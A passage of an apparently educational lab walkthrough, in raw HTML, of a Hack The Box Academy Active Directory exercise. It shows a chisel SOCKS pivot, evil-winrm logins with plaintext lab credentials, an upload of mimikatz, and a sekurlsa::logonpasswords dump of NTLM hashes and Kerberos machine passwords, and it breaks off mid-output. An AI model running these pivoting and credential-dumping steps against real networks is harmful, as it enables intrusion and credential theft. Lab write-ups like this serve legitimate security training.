class="nx">iugPQBM7bYUL4YCYLT4P157tKALSdqDCixpU</span><span class="o">=</span><span class="w"> </span><span class="mi">2026</span><span class="n">/05/01</span><span class="w"> </span><span class="nx">07:23:52</span><span class="w"> </span><span class="nx">server:</span><span class="w"> </span><span class="nx">Listening</span><span class="w"> </span><span class="nx">on</span><span class="w"> </span><span class="nx">http://0.0.0.0:1234</span><span class="w"> </span><span class="mi">2026</span><span class="n">/05/01</span><span class="w"> </span><span class="nx">07:24:42</span><span class="w"> </span><span class="nx">server:</span><span class="w"> </span><span class="nx">session</span><span class="c">#1: Client version (1.10.0) differs from server version (1.10.1)</span><span class="w"> </span></code></pre> </div> <p>Now we can start chisel on our attack machine as client:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-nyd2s4irji]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>chisel client <span class="nt">-v</span> 10.129.28.167:1234 socks 2026/05/01 09:24:42 client: Connecting to ws://10.129.28.167:1234 2026/05/01 09:24:42 client: tun: proxy#127.0.0.1:1080<span class="o">=&gt;</span>socks: Listening 2026/05/01 09:24:42 client: tun: Bound proxies 2026/05/01 09:24:42 client: Handshaking... 2026/05/01 09:24:42 client: Sending config 2026/05/01 09:24:42 client: Connected <span class="o">(</span>Latency 1.637637ms<span class="o">)</span> 2026/05/01 09:24:42 client: tun: SSH connected </code></pre> </div> <p>Because we are running on socks5 we need to modify the <code>/etc/proxychains.conf</code> to match what our attack machine is Listening.... when we start chisel as client <code>127.0.0.1:1080</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyhud8dwn1v2cf4j7gq77.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyhud8dwn1v2cf4j7gq77.png" alt="proxy" width="800" height="261"></a></p> <p>Now that our proxy server is set and we confirm the MS01 IP let's use evil_winram into the machine to submite the flag with proxychains flag before our command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>proxychains evil-winrm <span class="nt">-i</span> 172.16.6.50 <span class="nt">-u</span> svc_sql <span class="nt">-p</span> lucky7 </code></pre> </div> <p>We can also RDP into the host:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>proxychains xfreerdp /v:&lt;Server_IP&gt; /u:&lt;Username&gt; /p:&lt;Password&gt; /size:1920x1080 </code></pre> </div> <p>While enumerting MS01 I noticed another user:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">query</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="n">USERNAME</span><span class="w"> </span><span class="nx">SESSIONNAME</span><span class="w"> </span><span class="nx">ID</span><span class="w"> </span><span class="nx">STATE</span><span class="w"> </span><span class="nx">IDLE</span><span class="w"> </span><span class="nx">TIME</span><span class="w"> </span><span class="nx">LOGON</span><span class="w"> </span><span class="nx">TIME</span><span class="w"> </span><span class="n">tpetty</span><span class="w"> </span><span class="nx">console</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="nx">Active</span><span class="w"> </span><span class="nx">none</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">4:34</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">svc_sql</span><span class="w"> </span><span class="nx">rdp-tcp</span><span class="c">#2 2 Active 1:16 5/1/2026 5:41 AM</span><span class="w"> </span></code></pre> </div> <p>Let's upload mimikatz to see if we can get plain text password for the same user on the host:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">PS C:\&gt;</span><span class="w"> </span>upload /home/htb-ac-2510340/mimikatz.exe <span class="go"> Info: Uploading /home/htb-ac-2510340/mimikatz.exe to C:\\mimikatz.exe [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK Info: Upload successful! </span></code></pre> </div> <p>Let's run mimikatz with these flags "privilege::debug" "sekurlsa::logonpasswords":<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="o">.</span><span class="nx">\mimikatz.exe</span><span class="w"> </span><span class="s2">"privilege::debug"</span><span class="w"> </span><span class="s2">"sekurlsa::logonpasswords"</span><span class="w"> </span><span class="s2">"exit"</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="p">[</span><span class="n">proxychains</span><span class="p">]</span><span class="w"> </span><span class="n">Strict</span><span class="w"> </span><span class="nx">chain</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">127.0.0.1:1080</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">172.16.6.50:5985</span><span class="w"> </span><span class="o">...</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="o">.</span><span class="c">#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08</span><span class="w"> </span><span class="o">.</span><span class="c">## ^ ##. "A La Vie, A L'Amour" - (oe.eo)</span><span class="w"> </span><span class="c">## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><span class="w"> </span><span class="c">## \ / ## &gt; https://blog.gentilkiwi.com/mimikatz</span><span class="w"> </span><span class="s1">'## v ##'</span><span class="w"> </span><span class="n">Vincent</span><span class="w"> </span><span class="nx">LE</span><span class="w"> </span><span class="nx">TOUX</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="n">vincent.letoux</span><span class="err">@</span><span class="nx">gmail.com</span><span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="s1">'#####'</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="n">https://pingcastle.com</span><span class="w"> </span><span class="nx">/</span><span class="w"> </span><span class="nx">https://mysmartlogon.com</span><span class="w"> </span><span class="o">***</span><span class="nx">/</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># privilege::debug</span><span class="w"> </span><span class="n">Privilege</span><span class="w"> </span><span class="s1">'20'</span><span class="w"> </span><span class="nx">OK</span><span class="w"> </span><span class="n">mimikatz</span><span class="p">(</span><span class="n">commandline</span><span class="p">)</span><span class="w"> </span><span class="c"># sekurlsa::logonpasswords</span><span class="w"> </span><span class="n">Authentication</span><span class="w"> </span><span class="nx">Id</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="mi">1285573</span><span class="w"> </span><span class="p">(</span><span class="mi">00000000</span><span class="p">:</span><span class="mi">00139</span><span class="n">dc5</span><span class="p">)</span><span class="w"> </span><span class="n">Session</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Interactive</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">2</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">UMFD-2</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Font</span><span class="w"> </span><span class="nx">Driver</span><span class="w"> </span><span class="nx">Host</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Server</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Time</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">5:41:36</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">SID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-96-0-2</span><span class="w"> </span><span class="n">msv</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="mi">00000003</span><span class="p">]</span><span class="w"> </span><span class="n">Primary</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">8fbaa4a365f38f8148230a72efe206d3</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">SHA1</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">bed51be11137d6ea159e1952b768de1f04171903</span><span class="w"> </span><span class="n">tspkg</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">wdigest</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">kerberos</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">6c</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">9b</span><span class="w"> </span><span class="nx">b6</span><span class="w"> </span><span class="nx">db</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">6a</span><span class="w"> </span><span class="nx">c0</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">22</span><span class="w"> </span><span class="nx">37</span><span class="w"> </span><span class="nx">b7</span><span class="w"> </span><span class="nx">ee</span><span class="w"> </span><span class="nx">fc</span><span class="w"> </span><span class="nx">49</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">30</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">8c</span><span class="w"> </span><span class="nx">e2</span><span class="w"> </span><span class="nx">8c</span><span class="w"> </span><span class="nx">ef</span><span class="w"> </span><span class="nx">62</span><span class="w"> </span><span class="nx">82</span><span class="w"> </span><span class="nx">f0</span><span class="w"> </span><span class="nx">79</span><span class="w"> </span><span class="nx">78</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">b7</span><span class="w"> </span><span class="nx">8d</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">fa</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">bd</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">a6</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">96</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">c6</span><span class="w"> </span><span class="nx">91</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">08</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">c9</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">37</span><span class="w"> </span><span class="nx">91</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">e9</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">bd</span><span class="w"> </span><span class="nx">ad</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">21</span><span class="w"> </span><span class="nx">26</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">ab</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">26</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">6c</span><span class="w"> </span><span class="nx">0d</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">87</span><span class="w"> </span><span class="nx">97</span><span class="w"> </span><span class="nx">31</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">ec</span><span class="w"> </span><span class="nx">80</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">23</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">c8</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">d0</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">b5</span><span class="w"> </span><span class="nx">61</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">4d</span><span class="w"> </span><span class="nx">b0</span><span class="w"> </span><span class="nx">b6</span><span class="w"> </span><span class="nx">55</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">ba</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">2d</span><span class="w"> </span><span class="nx">4d</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">03</span><span class="w"> </span><span class="nx">8e</span><span class="w"> </span><span class="nx">93</span><span class="w"> </span><span class="nx">b3</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">43</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">c0</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="nx">5c</span><span class="w"> </span><span class="nx">29</span><span class="w"> </span><span class="nx">ce</span><span class="w"> </span><span class="nx">5d</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">f6</span><span class="w"> </span><span class="nx">08</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">d7</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">74</span><span class="w"> </span><span class="nx">98</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">3e</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">0e</span><span class="w"> </span><span class="nx">db</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">df</span><span class="w"> </span><span class="nx">f2</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">27</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">6b</span><span class="w"> </span><span class="nx">67</span><span class="w"> </span><span class="nx">2f</span><span class="w"> </span><span class="nx">65</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">4c</span><span class="w"> </span><span class="nx">39</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">51</span><span class="w"> </span><span class="nx">1c</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">33</span><span class="w"> </span><span class="nx">c7</span><span class="w"> </span><span class="nx">f0</span><span class="w"> </span><span class="nx">ed</span><span class="w"> </span><span class="nx">1b</span><span class="w"> </span><span class="nx">86</span><span class="w"> </span><span class="nx">0b</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">07</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">eb</span><span class="w"> </span><span class="nx">a2</span><span class="w"> </span><span class="nx">e9</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">a7</span><span class="w"> </span><span class="nx">8b</span><span class="w"> </span><span class="nx">15</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">38</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">7d</span><span class="w"> </span><span class="nx">74</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">92</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">61</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">33</span><span class="w"> </span><span class="nx">49</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">1b</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">96</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">d0</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">3b</span><span class="w"> </span><span class="nx">7f</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">b8</span><span class="w"> </span><span class="nx">8b</span><span class="w"> </span><span class="nx">9e</span><span class="w"> </span><span class="nx">cc</span><span class="w"> </span><span class="nx">6f</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">85</span><span class="w"> </span><span class="nx">b4</span><span class="w"> </span><span class="nx">77</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">f4</span><span class="w"> </span><span class="nx">f5</span><span class="w"> </span><span class="nx">3f</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">ee</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">70</span><span class="w"> </span><span class="nx">32</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">c8</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="n">ssp</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">credman</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">Authentication</span><span class="w"> </span><span class="nx">Id</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="mi">72704</span><span class="w"> </span><span class="p">(</span><span class="mi">00000000</span><span class="p">:</span><span class="mi">00011</span><span class="n">c00</span><span class="p">)</span><span class="w"> </span><span class="n">Session</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Interactive</span><span class="w"> </span><span class="nx">from</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="n">User</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">DWM-1</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">Window</span><span class="w"> </span><span class="nx">Manager</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Server</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">Logon</span><span class="w"> </span><span class="nx">Time</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">5/1/2026</span><span class="w"> </span><span class="nx">4:33:22</span><span class="w"> </span><span class="nx">AM</span><span class="w"> </span><span class="n">SID</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">S-1-5-90-0-1</span><span class="w"> </span><span class="n">msv</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="mi">00000003</span><span class="p">]</span><span class="w"> </span><span class="n">Primary</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">NTLM</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">8fbaa4a365f38f8148230a72efe206d3</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">SHA1</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">bed51be11137d6ea159e1952b768de1f04171903</span><span class="w"> </span><span class="n">tspkg</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">wdigest</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">(</span><span class="n">null</span><span class="p">)</span><span class="w"> </span><span class="n">kerberos</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MS01</span><span class="err">$</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Domain</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">60</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">d2</span><span class="w"> </span><span class="nx">54</span><span class="w"> </span><span class="nx">6c</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">dc</span><span class="w"> </span><span class="nx">9b</span><span class="w"> </span><span class="nx">b6</span><span class="w"> </span><span class="nx">db</span><span class="w"> </span><span class="nx">18</span><span class="w"> </span><span class="nx">48</span><span class="w"> </span><span class="nx">6a</span><span class="w"> </span><span class="nx">c0</span><span class="w"> </span><span class="nx">a0</span><span class="w"> </span><span class="nx">22</span><span class="w"> </span><span class="nx">37</span><span class="w"> </span><span class="nx">b7</span><span class="w"> </span><span class="nx">ee</span><span class="w"> </span><span class="nx">fc</span><span class="w"> </span><span class="nx">49</span><span class="w"> </span><span class="nx">d9</span><span class="w"> </span><span class="nx">30</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">8c</span><span class="w"> </span><span class="nx">e2</span><span class="w"> </span><span class="nx">8c</span><span class="w"> </span><span class="nx">ef</span><span class="w"> </span><span class="nx">62</span><span class="w"> </span><span class="nx">82</span><span class="w"> </span><span class="nx">f0</span><span class="w"> </span><span class="nx">79</span><span class="w"> </span><span class="nx">78</span><span class="w"> </span><span class="nx">4b</span><span class="w"> </span><span class="nx">53</span><span class="w"> </span><span class="nx">b7</span><span class="w"> </span><span class="nx">8d</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">fa</span><span class="w"> </span><span class="nx">a3</span><span class="w"> </span><span class="nx">bd</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">9c</span><span class="w"> </span><span class="nx">a6</span><span class="w"> </span><span class="nx">6d</span><span class="w"> </span><span class="nx">44</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">96</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">5e</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">c6</span><span class="w"> </span><span class="nx">91</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">08</span><span class="w"> </span><span class="nx">d4</span><span class="w"> </span><span class="nx">c9</span><span class="w"> </span><span class="nx">f3</span><span class="w"> </span><span class="nx">37</span><span class="w"> </span><span class="nx">91</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">13</span><span class="w"> </span><span class="nx">e9</span><span class="w"> </span><span class="nx">09</span><span class="w"> </span><span class="nx">63</span><span class="w"> </span><span class="nx">bd</span><span class="w"> </span><span class="nx">ad</span><span class="w"> </span><span class="nx">e0</span><span class="w"> </span><span class="nx">21</span><span class="w"> </span><span class="nx">26</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">d6</span><span class="w"> </span><span class="nx">57</span><span class="w"> </span><span class="nx">ab</span><span class="w"> </span><span class="nx">af</span><span class="w"> </span><span class="nx">26</span><span class="w"> </span><span class="nx">01</span><span class="w"> </span><span class="nx">1a</span><span class="w"> </span><span class="nx">7b</span><span class="w"> </span><span class="nx">6c</span><span class="w"> </span><span class="nx">0d</span><span class="w"> </span><span class="nx">45</span><span class="w"> </span><span class="nx">87</span><span class="w"> </span><span class="nx">97</span><span class="w"> </span><span class="nx">31</span><span class="w"> </span><span class="nx">84</span><span class="w"> </span><span class="nx">ec</span><span class="w"> </span><span class="nx">80</span><span class="w"> </span><span class="nx">36</span><span class="w"> </span><span class="nx">b1</span><span class="w"> </span><span class="nx">23</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">a5</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">c8</span><span class="w"> </span><span class="nx">81</span><span class="w"> </span><span class="nx">e1</span><span class="w"> </span><span class="nx">d0</span><span class="w"> </span><span class="nx">ac</span><span class="w"> </span><span class="nx">b5</span><span class="w"> </span><span class="nx">61</span><span class="w"> </span><span class="nx">a9</span><span class="w"> </span><span class="nx">4d</span><span class="w"> </span><span class="nx">b0</span><span class="w"> </span><span class="nx">b6</span><span class="w"> </span><span class="nx">55</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">ba</span><span class="w"> </span><span class="nx">89</span><span class="w"> </span><span class="nx">cf</span><span class="w"> </span><span class="nx">68</span><span class="w"> </span><span class="nx">bc</span><span class="w"> </span><span class="nx">a8</span><span class="w"> </span><span class="nx">2d</span><span class="w"> </span><span class="nx">4d</span><span class="w"> </span><span class="nx">fd</span><span class="w"> </span><span class="nx">03</span><span class="w"> </span><span class="nx">8e</span><span class="w"> </span><span class="nx">93</span><span class="w"> </span><span class="nx">b3</span><span class="w"> </span><span class="nx">b2</span><span class="w"> </span><span class="nx">1f</span><span class="w"> </span><span class="nx">d8</span><span class="w"> </span><span class="nx">43</span><span class="w"> </span><span class="nx">f9</span><span class="w"> </span><span class="nx">c0</span><span class="w"> </span><span class="nx">42</span><span class="w"> 